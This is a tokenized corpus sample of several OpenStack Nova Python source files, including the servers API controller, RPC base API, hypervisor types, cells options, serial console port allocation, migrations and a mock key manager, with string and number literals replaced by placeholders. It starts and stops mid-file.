format_message ( ) ) <EOL> except exception . Invalid : <EOL> msg = _ ( "<STR_LIT>" ) <EOL> raise exc . HTTPBadRequest ( explanation = msg ) <EOL> @ wsgi . response ( <NUM_LIT> ) <EOL> @ extensions . expected_errors ( ( <NUM_LIT> , <NUM_LIT> ) ) <EOL> def delete ( self , req , id ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> self . _delete ( req . environ [ '<STR_LIT>' ] , req , id ) <EOL> except exception . InstanceNotFound : <EOL> msg = _ ( "<STR_LIT>" ) <EOL> raise exc . HTTPNotFound ( explanation = msg ) <EOL> except exception . InstanceUnknownCell as e : <EOL> raise exc . HTTPNotFound ( explanation = e . format_message ( ) ) <EOL> except exception . InstanceIsLocked as e : <EOL> raise exc . HTTPConflict ( explanation = e . format_message ( ) ) <EOL> except exception . InstanceInvalidState as state_error : <EOL> common . raise_http_conflict_for_instance_invalid_state ( state_error , <EOL> '<STR_LIT>' , id ) <EOL> def _image_uuid_from_href ( self , image_href ) : <EOL> image_uuid = image_href . split ( '<STR_LIT:/>' ) . pop ( ) <EOL> if not uuidutils . is_uuid_like ( image_uuid ) : <EOL> msg = _ ( "<STR_LIT>" ) <EOL> raise exc . HTTPBadRequest ( explanation = msg ) <EOL> return image_uuid <EOL> def _image_from_req_data ( self , server_dict , create_kwargs ) : <EOL> """<STR_LIT>""" <EOL> image_href = server_dict . get ( '<STR_LIT>' ) <EOL> if not image_href and create_kwargs . get ( '<STR_LIT>' ) : <EOL> return '<STR_LIT>' <EOL> elif image_href : <EOL> return self . _image_uuid_from_href ( six . text_type ( image_href ) ) <EOL> else : <EOL> msg = _ ( "<STR_LIT>" ) <EOL> raise exc . HTTPBadRequest ( explanation = msg ) <EOL> def _flavor_id_from_req_data ( self , data ) : <EOL> flavor_ref = data [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> return common . get_id_from_href ( flavor_ref ) <EOL> @ wsgi . response ( <NUM_LIT> ) <EOL> @ extensions . expected_errors ( ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) ) <EOL> @ wsgi . 
action ( '<STR_LIT>' ) <EOL> @ validation . schema ( schema_server_resize ) <EOL> def _action_resize ( self , req , id , body ) : <EOL> """<STR_LIT>""" <EOL> resize_dict = body [ '<STR_LIT>' ] <EOL> flavor_ref = str ( resize_dict [ "<STR_LIT>" ] ) <EOL> resize_kwargs = { } <EOL> if list ( self . resize_extension_manager ) : <EOL> self . resize_extension_manager . map ( self . _resize_extension_point , <EOL> resize_dict , resize_kwargs ) <EOL> self . _resize ( req , id , flavor_ref , ** resize_kwargs ) <EOL> @ wsgi . response ( <NUM_LIT> ) <EOL> @ extensions . expected_errors ( ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) ) <EOL> @ wsgi . action ( '<STR_LIT>' ) <EOL> @ validation . schema ( schema_server_rebuild_v20 , '<STR_LIT>' , '<STR_LIT>' ) <EOL> @ validation . schema ( schema_server_rebuild , '<STR_LIT>' , '<STR_LIT>' ) <EOL> @ validation . schema ( schema_server_rebuild_v219 , '<STR_LIT>' ) <EOL> def _action_rebuild ( self , req , id , body ) : <EOL> """<STR_LIT>""" <EOL> rebuild_dict = body [ '<STR_LIT>' ] <EOL> image_href = rebuild_dict [ "<STR_LIT>" ] <EOL> image_href = self . _image_uuid_from_href ( image_href ) <EOL> password = self . _get_server_admin_password ( rebuild_dict ) <EOL> context = req . environ [ '<STR_LIT>' ] <EOL> authorize ( context , action = '<STR_LIT>' ) <EOL> instance = self . _get_server ( context , req , id ) <EOL> attr_map = { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT:description>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> rebuild_kwargs = { } <EOL> if list ( self . rebuild_extension_manager ) : <EOL> self . rebuild_extension_manager . map ( self . _rebuild_extension_point , <EOL> rebuild_dict , rebuild_kwargs ) <EOL> for request_attribute , instance_attribute in attr_map . items ( ) : <EOL> try : <EOL> if request_attribute == '<STR_LIT:name>' : <EOL> rebuild_kwargs [ instance_attribute ] = common . 
normalize_name ( <EOL> rebuild_dict [ request_attribute ] ) <EOL> else : <EOL> rebuild_kwargs [ instance_attribute ] = rebuild_dict [ <EOL> request_attribute ] <EOL> except ( KeyError , TypeError ) : <EOL> pass <EOL> try : <EOL> self . compute_api . rebuild ( context , <EOL> instance , <EOL> image_href , <EOL> password , <EOL> ** rebuild_kwargs ) <EOL> except exception . InstanceIsLocked as e : <EOL> raise exc . HTTPConflict ( explanation = e . format_message ( ) ) <EOL> except exception . InstanceInvalidState as state_error : <EOL> common . raise_http_conflict_for_instance_invalid_state ( state_error , <EOL> '<STR_LIT>' , id ) <EOL> except exception . InstanceNotFound : <EOL> msg = _ ( "<STR_LIT>" ) <EOL> raise exc . HTTPNotFound ( explanation = msg ) <EOL> except exception . InstanceUnknownCell as e : <EOL> raise exc . HTTPNotFound ( explanation = e . format_message ( ) ) <EOL> except exception . ImageNotFound : <EOL> msg = _ ( "<STR_LIT>" ) <EOL> raise exc . HTTPBadRequest ( explanation = msg ) <EOL> except exception . QuotaError as error : <EOL> raise exc . HTTPForbidden ( explanation = error . format_message ( ) ) <EOL> except ( exception . ImageNotActive , <EOL> exception . FlavorDiskTooSmall , <EOL> exception . FlavorMemoryTooSmall , <EOL> exception . InvalidMetadata , <EOL> exception . AutoDiskConfigDisabledByImage ) as error : <EOL> raise exc . HTTPBadRequest ( explanation = error . format_message ( ) ) <EOL> instance = self . _get_server ( context , req , id , is_detail = True ) <EOL> view = self . _view_builder . show ( req , instance , extend_address = False ) <EOL> if CONF . enable_instance_password : <EOL> view [ '<STR_LIT>' ] [ '<STR_LIT>' ] = password <EOL> robj = wsgi . ResponseObject ( view ) <EOL> return self . _add_location ( robj ) <EOL> @ wsgi . response ( <NUM_LIT> ) <EOL> @ extensions . expected_errors ( ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) ) <EOL> @ wsgi . action ( '<STR_LIT>' ) <EOL> @ common . 
check_snapshots_enabled <EOL> @ validation . schema ( schema_servers . create_image , '<STR_LIT>' , '<STR_LIT>' ) <EOL> @ validation . schema ( schema_servers . create_image , '<STR_LIT>' ) <EOL> def _action_create_image ( self , req , id , body ) : <EOL> """<STR_LIT>""" <EOL> context = req . environ [ '<STR_LIT>' ] <EOL> authorize ( context , action = '<STR_LIT>' ) <EOL> entity = body [ "<STR_LIT>" ] <EOL> image_name = common . normalize_name ( entity [ "<STR_LIT:name>" ] ) <EOL> metadata = entity . get ( '<STR_LIT>' , { } ) <EOL> common . check_img_metadata_properties_quota ( context , metadata ) <EOL> instance = self . _get_server ( context , req , id ) <EOL> bdms = objects . BlockDeviceMappingList . get_by_instance_uuid ( <EOL> context , instance . uuid ) <EOL> try : <EOL> if self . compute_api . is_volume_backed_instance ( context , instance , <EOL> bdms ) : <EOL> authorize ( context , action = "<STR_LIT>" ) <EOL> image = self . compute_api . snapshot_volume_backed ( <EOL> context , <EOL> instance , <EOL> image_name , <EOL> extra_properties = <EOL> metadata ) <EOL> else : <EOL> image = self . compute_api . snapshot ( context , <EOL> instance , <EOL> image_name , <EOL> extra_properties = metadata ) <EOL> except exception . InstanceUnknownCell as e : <EOL> raise exc . HTTPNotFound ( explanation = e . format_message ( ) ) <EOL> except exception . InstanceInvalidState as state_error : <EOL> common . raise_http_conflict_for_instance_invalid_state ( state_error , <EOL> '<STR_LIT>' , id ) <EOL> except exception . Invalid as err : <EOL> raise exc . HTTPBadRequest ( explanation = err . format_message ( ) ) <EOL> image_id = str ( image [ '<STR_LIT:id>' ] ) <EOL> image_ref = glance . generate_image_url ( image_id ) <EOL> resp = webob . Response ( status_int = <NUM_LIT> ) <EOL> resp . 
headers [ '<STR_LIT>' ] = image_ref <EOL> return resp <EOL> def _get_server_admin_password ( self , server ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> password = server [ '<STR_LIT>' ] <EOL> except KeyError : <EOL> password = utils . generate_password ( ) <EOL> return password <EOL> def _get_server_search_options ( self , req ) : <EOL> """<STR_LIT>""" <EOL> opt_list = ( '<STR_LIT>' , '<STR_LIT:name>' , '<STR_LIT:status>' , '<STR_LIT:image>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> if api_version_request . is_supported ( req , min_version = '<STR_LIT>' ) : <EOL> opt_list += ( '<STR_LIT>' , ) <EOL> return opt_list <EOL> def _get_instance ( self , context , instance_uuid ) : <EOL> try : <EOL> attrs = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> return objects . Instance . get_by_uuid ( context , instance_uuid , <EOL> expected_attrs = attrs ) <EOL> except exception . InstanceNotFound as e : <EOL> raise webob . exc . HTTPNotFound ( explanation = e . format_message ( ) ) <EOL> @ wsgi . response ( <NUM_LIT> ) <EOL> @ extensions . expected_errors ( ( <NUM_LIT> , <NUM_LIT> ) ) <EOL> @ wsgi . action ( '<STR_LIT>' ) <EOL> def _start_server ( self , req , id , body ) : <EOL> """<STR_LIT>""" <EOL> context = req . environ [ '<STR_LIT>' ] <EOL> instance = self . _get_instance ( context , id ) <EOL> authorize ( context , instance , '<STR_LIT:start>' ) <EOL> LOG . debug ( '<STR_LIT>' , instance = instance ) <EOL> try : <EOL> self . compute_api . start ( context , instance ) <EOL> except ( exception . InstanceNotReady , exception . InstanceIsLocked ) as e : <EOL> raise webob . exc . HTTPConflict ( explanation = e . format_message ( ) ) <EOL> except exception . InstanceUnknownCell as e : <EOL> raise exc . HTTPNotFound ( explanation = e . format_message ( ) ) <EOL> except exception . InstanceInvalidState as state_error : <EOL> common . raise_http_conflict_for_instance_invalid_state ( state_error , <EOL> '<STR_LIT:start>' , id ) <EOL> @ wsgi . 
response ( <NUM_LIT> ) <EOL> @ extensions . expected_errors ( ( <NUM_LIT> , <NUM_LIT> ) ) <EOL> @ wsgi . action ( '<STR_LIT>' ) <EOL> def _stop_server ( self , req , id , body ) : <EOL> """<STR_LIT>""" <EOL> context = req . environ [ '<STR_LIT>' ] <EOL> instance = self . _get_instance ( context , id ) <EOL> authorize ( context , instance , '<STR_LIT>' ) <EOL> LOG . debug ( '<STR_LIT>' , instance = instance ) <EOL> try : <EOL> self . compute_api . stop ( context , instance ) <EOL> except ( exception . InstanceNotReady , exception . InstanceIsLocked ) as e : <EOL> raise webob . exc . HTTPConflict ( explanation = e . format_message ( ) ) <EOL> except exception . InstanceUnknownCell as e : <EOL> raise exc . HTTPNotFound ( explanation = e . format_message ( ) ) <EOL> except exception . InstanceInvalidState as state_error : <EOL> common . raise_http_conflict_for_instance_invalid_state ( state_error , <EOL> '<STR_LIT>' , id ) <EOL> @ wsgi . Controller . api_version ( "<STR_LIT>" ) <EOL> @ wsgi . response ( <NUM_LIT> ) <EOL> @ extensions . expected_errors ( ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) ) <EOL> @ wsgi . action ( '<STR_LIT>' ) <EOL> @ validation . schema ( schema_servers . trigger_crash_dump ) <EOL> def _action_trigger_crash_dump ( self , req , id , body ) : <EOL> """<STR_LIT>""" <EOL> context = req . environ [ '<STR_LIT>' ] <EOL> instance = self . _get_instance ( context , id ) <EOL> authorize ( context , instance , '<STR_LIT>' ) <EOL> try : <EOL> self . compute_api . trigger_crash_dump ( context , instance ) <EOL> except exception . InstanceInvalidState as state_error : <EOL> common . raise_http_conflict_for_instance_invalid_state ( state_error , <EOL> '<STR_LIT>' , id ) <EOL> except ( exception . InstanceNotReady , exception . InstanceIsLocked ) as e : <EOL> raise webob . exc . HTTPConflict ( explanation = e . format_message ( ) ) <EOL> except exception . TriggerCrashDumpNotSupported as e : <EOL> raise webob . exc . HTTPBadRequest ( explanation = e . 
format_message ( ) )


def remove_invalid_options(context, search_options, allowed_search_options):
    """<STR_LIT>"""
    # Admin callers may use any search option; only a fixed set of internal
    # keys is always stripped before returning.
    if context.is_admin:
        for key in ('<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>'):
            search_options.pop(key, None)
        return
    # Non-admin callers: drop (with a debug log) any option that is not in
    # the allowed set, mutating search_options in place.
    unknown_options = [opt for opt in search_options
                       if opt not in allowed_search_options]
    if unknown_options:
        LOG.debug("<STR_LIT>",
                  "<STR_LIT:U+002CU+0020>".join(unknown_options))
        for opt in unknown_options:
            search_options.pop(opt, None)


class Servers(extensions.V21APIExtensionBase):
    """<STR_LIT>"""

    name = "<STR_LIT>"
    alias = ALIAS
    version = <NUM_LIT:1>

    def get_resources(self):
        """Return the servers resource with its member/collection routes."""
        member_actions = {'<STR_LIT:action>': '<STR_LIT:POST>'}
        collection_actions = {'<STR_LIT>': '<STR_LIT:GET>'}
        resources = [
            extensions.ResourceExtension(
                ALIAS,
                ServersController(extension_info=self.extension_info),
                member_name='<STR_LIT>', collection_actions=collection_actions,
                member_actions=member_actions)]
        return resources

    def get_controller_extensions(self):
        # This plugin contributes no controller extensions of its own.
        return [] </s>
<s> """<STR_LIT>"""

from oslo_config import cfg
import oslo_messaging as messaging
from oslo_serialization import jsonutils

from nova import rpc

CONF = cfg.CONF

# Version cap for the base RPC API, used during rolling upgrades; registered
# under its own config group below.
rpcapi_cap_opt = cfg.StrOpt('<STR_LIT>',
                            help='<STR_LIT>'
                                 '<STR_LIT>')
CONF.register_opt(rpcapi_cap_opt, '<STR_LIT>')

_NAMESPACE = '<STR_LIT>'


class BaseAPI(object):
    """<STR_LIT>"""

    # Map of symbolic release aliases to concrete RPC version strings; a
    # configured cap that is not an alias is used verbatim.
    VERSION_ALIASES = {
    }

    def __init__(self, topic):
        super(BaseAPI, self).__init__()
        target = messaging.Target(topic=topic,
                                  namespace=_NAMESPACE,
                                  version='<STR_LIT:1.0>')
        # Resolve the configured cap through the alias map, falling back to
        # the raw configured value when it is not an alias.
        version_cap = self.VERSION_ALIASES.get(CONF.upgrade_levels.baseapi,
                                               CONF.upgrade_levels.baseapi)
        self.client = rpc.get_client(target, version_cap=version_cap)

    def ping(self, context, arg, timeout=None):
        # Round-trip an arbitrary argument, converted to JSON primitives so
        # it can cross the RPC boundary.
        arg_p = jsonutils.to_primitive(arg)
        cctxt = self.client.prepare(timeout=timeout)
        return cctxt.call(context, '<STR_LIT>', arg=arg_p)

    def get_backdoor_port(self, context, host):
        # Directed call to one specific server host.
        cctxt = self.client.prepare(server=host, version='<STR_LIT>')
        return cctxt.call(context, '<STR_LIT>')


class BaseRPCAPI(object):
    """<STR_LIT>"""

    target = messaging.Target(namespace=_NAMESPACE, version='<STR_LIT>')

    def __init__(self, service_name, backdoor_port):
        self.service_name = service_name
        self.backdoor_port = backdoor_port

    def ping(self, context, arg):
        # Echo the argument back along with this service's name.
        resp = {'<STR_LIT>': self.service_name, '<STR_LIT>': arg}
        return jsonutils.to_primitive(resp)

    def get_backdoor_port(self, context):
        return self.backdoor_port </s>
<s> """<STR_LIT>"""

import sys

from oslo_log import log as logging
from oslo_reports import guru_meditation_report as gmr

from nova.conductor import rpcapi as conductor_rpcapi
import nova.conf
from nova import config
from nova import objects
from nova.objects import base as objects_base
from nova import service
from nova import utils
from nova import version

CONF = nova.conf.CONF
CONF.import_opt('<STR_LIT>', '<STR_LIT>')


def main():
    """Parse config, set up logging/objects, then serve the WSGI service."""
    config.parse_args(sys.argv)
    logging.setup(CONF, "<STR_LIT>")
    utils.monkey_patch()
    objects.register_all()
    # Enable the Guru Meditation diagnostic report for this process.
    gmr.TextGuruMeditation.setup_autorun(version)
    # With a remote conductor, route object method calls through its RPC API.
    if not CONF.conductor.use_local:
        objects_base.NovaObject.indirection_api = conductor_rpcapi.ConductorAPI()
    # SSL is enabled only when this API appears in the configured SSL list.
    should_use_ssl = '<STR_LIT>' in CONF.enabled_ssl_apis
    server = service.WSGIService('<STR_LIT>', use_ssl=should_use_ssl)
    service.serve(server, workers=server.workers)
    service.wait() </s>
<s> """<STR_LIT>"""

from nova import exception

# Canonical hypervisor virt-type constants.
BAREMETAL = "<STR_LIT>"
BHYVE = "<STR_LIT>"
DOCKER = "<STR_LIT>"
FAKE = "<STR_LIT>"
HYPERV = "<STR_LIT>"
IRONIC = "<STR_LIT>"
KQEMU = "<STR_LIT>"
KVM = "<STR_LIT>"
LXC = "<STR_LIT>"
LXD = "<STR_LIT>"
OPENVZ = "<STR_LIT>"
PARALLELS = "<STR_LIT>"
VIRTUOZZO = "<STR_LIT>"
PHYP = "<STR_LIT>"
QEMU = "<STR_LIT>"
TEST = "<STR_LIT:test>"
UML = "<STR_LIT>"
VBOX = "<STR_LIT>"
VMWARE = "<STR_LIT>"
XEN = "<STR_LIT>"
ZVM = "<STR_LIT>"

# The complete set of recognized virt types; membership here defines
# validity for is_valid()/canonicalize().
ALL = (
    BAREMETAL,
    BHYVE,
    DOCKER,
    FAKE,
    HYPERV,
    IRONIC,
    KQEMU,
    KVM,
    LXC,
    LXD,
    OPENVZ,
    PARALLELS,
    PHYP,
    QEMU,
    TEST,
    UML,
    VBOX,
    VIRTUOZZO,
    VMWARE,
    XEN,
    ZVM,
)


def is_valid(name):
    """<STR_LIT>"""
    return name in ALL


def canonicalize(name):
    """<STR_LIT>"""
    # None passes through unchanged; everything else is lowercased and must
    # end up in ALL or an InvalidHypervisorVirtType is raised.
    if name is None:
        return None
    newname = name.lower()
    # One legacy spelling is remapped onto the XEN constant.
    if newname == "<STR_LIT>":
        newname = XEN
    if not is_valid(newname):
        raise exception.InvalidHypervisorVirtType(hv_type=name)
    return newname </s>
<s> import itertools

from oslo_config import cfg

# Options for the top-level cells feature.
cells_opts = [
    cfg.BoolOpt('<STR_LIT>',
                default=False,
                help="""<STR_LIT>"""),
    cfg.StrOpt('<STR_LIT>',
               default='<STR_LIT>',
               help="""<STR_LIT>"""),
    cfg.StrOpt('<STR_LIT>',
               default='<STR_LIT>',
               help="""<STR_LIT>""",
               deprecated_for_removal=True
               ),
    cfg.StrOpt('<STR_LIT:name>',
               default='<STR_LIT>',
               help="""<STR_LIT>"""),
    cfg.ListOpt('<STR_LIT>',
                default=['<STR_LIT>', '<STR_LIT>'],
                help="""<STR_LIT>"""),
    cfg.IntOpt('<STR_LIT>',
               default=<NUM_LIT>,
               help="""<STR_LIT>"""),
    cfg.FloatOpt('<STR_LIT>',
                 default=<NUM_LIT>,
                 help="""<STR_LIT>"""),
    cfg.StrOpt('<STR_LIT>',
               default='<STR_LIT>',
               choices=('<STR_LIT>', '<STR_LIT>'),
               help="""<STR_LIT>"""),
    cfg.IntOpt("<STR_LIT>",
               default=<NUM_LIT>,
               help="""<STR_LIT>"""),
    cfg.IntOpt('<STR_LIT>',
               default=<NUM_LIT>,
               help="""<STR_LIT>"""),
    cfg.IntOpt('<STR_LIT>',
               default=<NUM_LIT:100>,
               help="""<STR_LIT>"""),
]

# Weigher tuning knobs (mute / ram / generic weighers).
mute_weigher_opts = [
    cfg.FloatOpt('<STR_LIT>',
                 default=-<NUM_LIT>,
                 help="""<STR_LIT>"""),
]

ram_weigher_opts = [
    cfg.FloatOpt('<STR_LIT>',
                 default=<NUM_LIT>,
                 help="""<STR_LIT>"""),
]

weigher_opts = [
    cfg.FloatOpt('<STR_LIT>',
                 default=<NUM_LIT:1.0>,
                 help="""<STR_LIT>"""),
]

# Options consumed by the cells manager service.
cell_manager_opts = [
    cfg.StrOpt('<STR_LIT>',
               default='<STR_LIT>',
               help="""<STR_LIT>"""),
    cfg.IntOpt("<STR_LIT>",
               default=<NUM_LIT>,
               help="""<STR_LIT>"""),
    cfg.IntOpt("<STR_LIT>",
               default=<NUM_LIT:1>,
               help="""<STR_LIT>""")
]

# Options for inter-cell messaging.
cell_messaging_opts = [
    cfg.IntOpt('<STR_LIT>',
               default=<NUM_LIT:10>,
               help="""<STR_LIT>"""),
    cfg.StrOpt('<STR_LIT>',
               default='<STR_LIT>',
               help="""<STR_LIT>""")
]

cell_rpc_driver_opts = [
    cfg.StrOpt('<STR_LIT>',
               default='<STR_LIT>',
               help="""<STR_LIT>""")
]

# Options for the cells scheduler (filters, weighers, retry behaviour).
cell_scheduler_opts = [
    cfg.ListOpt('<STR_LIT>',
                default=['<STR_LIT>'],
                help="""<STR_LIT>"""),
    cfg.ListOpt('<STR_LIT>',
                default=['<STR_LIT>'],
                help="""<STR_LIT>"""),
    cfg.IntOpt('<STR_LIT>',
               default=<NUM_LIT:10>,
               help="""<STR_LIT>"""),
    cfg.IntOpt('<STR_LIT>',
               default=<NUM_LIT:2>,
               help="""<STR_LIT>""")
]

cell_state_manager_opts = [
    cfg.IntOpt('<STR_LIT>',
               default=<NUM_LIT>,
               help="""<STR_LIT>"""),
    cfg.StrOpt('<STR_LIT>',
               help="""<STR_LIT>""")
]

# RPC API version caps; registered under a separate group from the rest.
rpcapi_cap_intercell_opt = cfg.StrOpt('<STR_LIT>',
                                      help="""<STR_LIT>""")

rpcapi_cap_cells_opt = cfg.StrOpt('<STR_LIT>',
                                  help="""<STR_LIT>""")

# Flattened view of every cells option, used for registration and listing.
ALL_CELLS_OPTS = list(itertools.chain(
    cells_opts,
    mute_weigher_opts,
    ram_weigher_opts,
    weigher_opts,
    cell_manager_opts,
    cell_messaging_opts,
    cell_rpc_driver_opts,
    cell_scheduler_opts,
    cell_state_manager_opts
))

ALL_RPCAPI_CAP_OPTS = [rpcapi_cap_intercell_opt,
                       rpcapi_cap_cells_opt]


def register_opts(conf):
    """Register all cells options on the given ConfigOpts object."""
    conf.register_opts(ALL_CELLS_OPTS, group="<STR_LIT>")
    conf.register_opts(ALL_RPCAPI_CAP_OPTS, group="<STR_LIT>")


def list_opts():
    """Return a dict mapping each group name to its option list."""
    return {
        '<STR_LIT>': ALL_CELLS_OPTS,
        '<STR_LIT>': ALL_RPCAPI_CAP_OPTS,
    } </s>
<s> """<STR_LIT>""" <EOL> import socket <EOL> from oslo_log import log as logging <EOL> import six . moves <EOL> import nova . conf <EOL> from nova import exception <EOL> from nova . i18n import _LW <EOL> from nova import utils <EOL> LOG = logging . getLogger ( __name__ ) <EOL> ALLOCATED_PORTS = set ( ) <EOL> SERIAL_LOCK = '<STR_LIT>' <EOL> CONF = nova . conf . CONF <EOL> @ utils . synchronized ( SERIAL_LOCK ) <EOL> def acquire_port ( host ) : <EOL> """<STR_LIT>""" <EOL> start , stop = _get_port_range ( ) <EOL> for port in six . moves . range ( start , stop ) : <EOL> if ( host , port ) in ALLOCATED_PORTS : <EOL> continue <EOL> try : <EOL> _verify_port ( host , port ) <EOL> ALLOCATED_PORTS . add ( ( host , port ) ) <EOL> return port <EOL> except exception . SocketPortInUseException as e : <EOL> LOG . warning ( e . format_message ( ) ) <EOL> raise exception . SocketPortRangeExhaustedException ( host = host ) <EOL> @ utils . synchronized ( SERIAL_LOCK ) <EOL> def release_port ( host , port ) : <EOL> """<STR_LIT>""" <EOL> ALLOCATED_PORTS . discard ( ( host , port ) ) <EOL> def _get_port_range ( ) : <EOL> config_range = CONF . serial_console . port_range <EOL> try : <EOL> start , stop = map ( int , config_range . split ( '<STR_LIT::>' ) ) <EOL> if start >= stop : <EOL> raise ValueError <EOL> except ValueError : <EOL> default_port_range = nova . conf . serial_console . DEFAULT_PORT_RANGE <EOL> LOG . warning ( _LW ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) , <EOL> { '<STR_LIT>' : config_range , <EOL> '<STR_LIT:default>' : default_port_range } ) <EOL> start , stop = map ( int , default_port_range . split ( '<STR_LIT::>' ) ) <EOL> return start , stop <EOL> def _verify_port ( host , port ) : <EOL> s = socket . socket ( ) <EOL> try : <EOL> s . bind ( ( host , port ) ) <EOL> except socket . error as e : <EOL> raise exception . SocketPortInUseException ( <EOL> host = host , port = port , error = e ) <EOL> finally : <EOL> s . close ( ) </s>
<s> from sqlalchemy import Column <EOL> from sqlalchemy import MetaData <EOL> from sqlalchemy import Table <EOL> from sqlalchemy import Text <EOL> def upgrade ( migrate_engine ) : <EOL> meta = MetaData ( ) <EOL> meta . bind = migrate_engine <EOL> compute_nodes = Table ( '<STR_LIT>' , meta , autoload = True ) <EOL> shadow_compute_nodes = Table ( '<STR_LIT>' , meta , autoload = True ) <EOL> extra_resources = Column ( '<STR_LIT>' , Text , nullable = True ) <EOL> shadow_extra_resources = Column ( '<STR_LIT>' , Text , nullable = True ) <EOL> compute_nodes . create_column ( extra_resources ) <EOL> shadow_compute_nodes . create_column ( shadow_extra_resources ) </s>
<s> from oslo_log import log as logging
from sqlalchemy import MetaData, Table, Index

from nova.i18n import _LI

LOG = logging.getLogger(__name__)


def upgrade(migrate_engine):
    """<STR_LIT>"""
    meta = MetaData(bind=migrate_engine)
    instances = Table('<STR_LIT>', meta, autoload=True)
    # Create the two-column index only when an equivalent one is not already
    # present; the for/else's else branch runs only if no break occurred.
    for index in instances.indexes:
        if [c.name for c in index.columns] == ['<STR_LIT>', '<STR_LIT>']:
            LOG.info(_LI('<STR_LIT>'
                         '<STR_LIT>'))
            break
    else:
        index = Index('<STR_LIT>',
                      instances.c.project_id, instances.c.deleted)
        index.create()
    # Drop the old single-column index that the new one supersedes, if any.
    for index in instances.indexes:
        if [c.name for c in index.columns] == ['<STR_LIT>']:
            index.drop() </s>
<s> from oslo_log import log as logging <EOL> from sqlalchemy import MetaData , Table , Index <EOL> from nova . i18n import _LI <EOL> LOG = logging . getLogger ( __name__ ) <EOL> INDEX_COLUMNS = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> INDEX_NAME = '<STR_LIT>' <EOL> def _get_table_index ( migrate_engine ) : <EOL> meta = MetaData ( ) <EOL> meta . bind = migrate_engine <EOL> table = Table ( '<STR_LIT>' , meta , autoload = True ) <EOL> for idx in table . indexes : <EOL> if idx . columns . keys ( ) == INDEX_COLUMNS : <EOL> break <EOL> else : <EOL> idx = None <EOL> return meta , table , idx <EOL> def upgrade ( migrate_engine ) : <EOL> meta , table , index = _get_table_index ( migrate_engine ) <EOL> if index : <EOL> LOG . info ( _LI ( '<STR_LIT>' <EOL> '<STR_LIT>' ) , INDEX_NAME ) <EOL> return <EOL> columns = [ getattr ( table . c , col_name ) for col_name in INDEX_COLUMNS ] <EOL> index = Index ( INDEX_NAME , * columns ) <EOL> index . create ( migrate_engine ) </s>
<s> """<STR_LIT>""" <EOL> import array <EOL> from oslo_log import log as logging <EOL> from oslo_utils import uuidutils <EOL> from nova import exception <EOL> from nova . i18n import _LW <EOL> from nova . keymgr import key <EOL> from nova . keymgr import key_mgr <EOL> from nova import utils <EOL> LOG = logging . getLogger ( __name__ ) <EOL> class MockKeyManager ( key_mgr . KeyManager ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> LOG . warning ( _LW ( '<STR_LIT>' <EOL> '<STR_LIT>' ) ) <EOL> self . keys = { } <EOL> def _generate_hex_key ( self , ** kwargs ) : <EOL> key_length = kwargs . get ( '<STR_LIT>' , <NUM_LIT> ) <EOL> hex_encoded = utils . generate_password ( length = key_length / <NUM_LIT:4> , <EOL> symbolgroups = '<STR_LIT>' ) <EOL> return hex_encoded <EOL> def _generate_key ( self , ** kwargs ) : <EOL> _hex = self . _generate_hex_key ( ** kwargs ) <EOL> return key . SymmetricKey ( '<STR_LIT>' , <EOL> array . array ( '<STR_LIT:B>' , _hex . decode ( '<STR_LIT>' ) ) . tolist ( ) ) <EOL> def create_key ( self , ctxt , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if ctxt is None : <EOL> raise exception . Forbidden ( ) <EOL> key = self . _generate_key ( ** kwargs ) <EOL> return self . store_key ( ctxt , key ) <EOL> def _generate_key_id ( self ) : <EOL> key_id = uuidutils . generate_uuid ( ) <EOL> while key_id in self . keys : <EOL> key_id = uuidutils . generate_uuid ( ) <EOL> return key_id <EOL> def store_key ( self , ctxt , key , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if ctxt is None : <EOL> raise exception . Forbidden ( ) <EOL> key_id = self . _generate_key_id ( ) <EOL> self . keys [ key_id ] = key <EOL> return key_id <EOL> def copy_key ( self , ctxt , key_id , ** kwargs ) : <EOL> if ctxt is None : <EOL> raise exception . Forbidden ( ) <EOL> copied_key_id = self . _generate_key_id ( ) <EOL> self . keys [ copied_key_id ] = self . 
keys [ key_id ] <EOL> return copied_key_id <EOL> def get_key ( self , ctxt , key_id , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if ctxt is None : <EOL> raise exception . Forbidden ( ) <EOL> return self . keys [ key_id ] <EOL> def delete_key ( self , ctxt , key_id , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if ctxt is None : <EOL> raise exception . Forbidden ( ) <EOL> del self . keys [ key_id ] </s>
<s> import urllib <EOL> from nova import exception <EOL> from nova . i18n import _ <EOL> from nova import utils <EOL> class SecurityGroupBase ( object ) : <EOL> def __init__ ( self , skip_policy_check = False ) : <EOL> self . skip_policy_check = skip_policy_check <EOL> def parse_cidr ( self , cidr ) : <EOL> if cidr : <EOL> try : <EOL> cidr = urllib . unquote ( cidr ) . decode ( ) <EOL> except Exception as e : <EOL> self . raise_invalid_cidr ( cidr , e ) <EOL> if not utils . is_valid_cidr ( cidr ) : <EOL> self . raise_invalid_cidr ( cidr ) <EOL> return cidr <EOL> else : <EOL> return '<STR_LIT>' <EOL> @ staticmethod <EOL> def new_group_ingress_rule ( grantee_group_id , protocol , from_port , <EOL> to_port ) : <EOL> return SecurityGroupBase . _new_ingress_rule ( <EOL> protocol , from_port , to_port , group_id = grantee_group_id ) <EOL> @ staticmethod <EOL> def new_cidr_ingress_rule ( grantee_cidr , protocol , from_port , to_port ) : <EOL> return SecurityGroupBase . _new_ingress_rule ( <EOL> 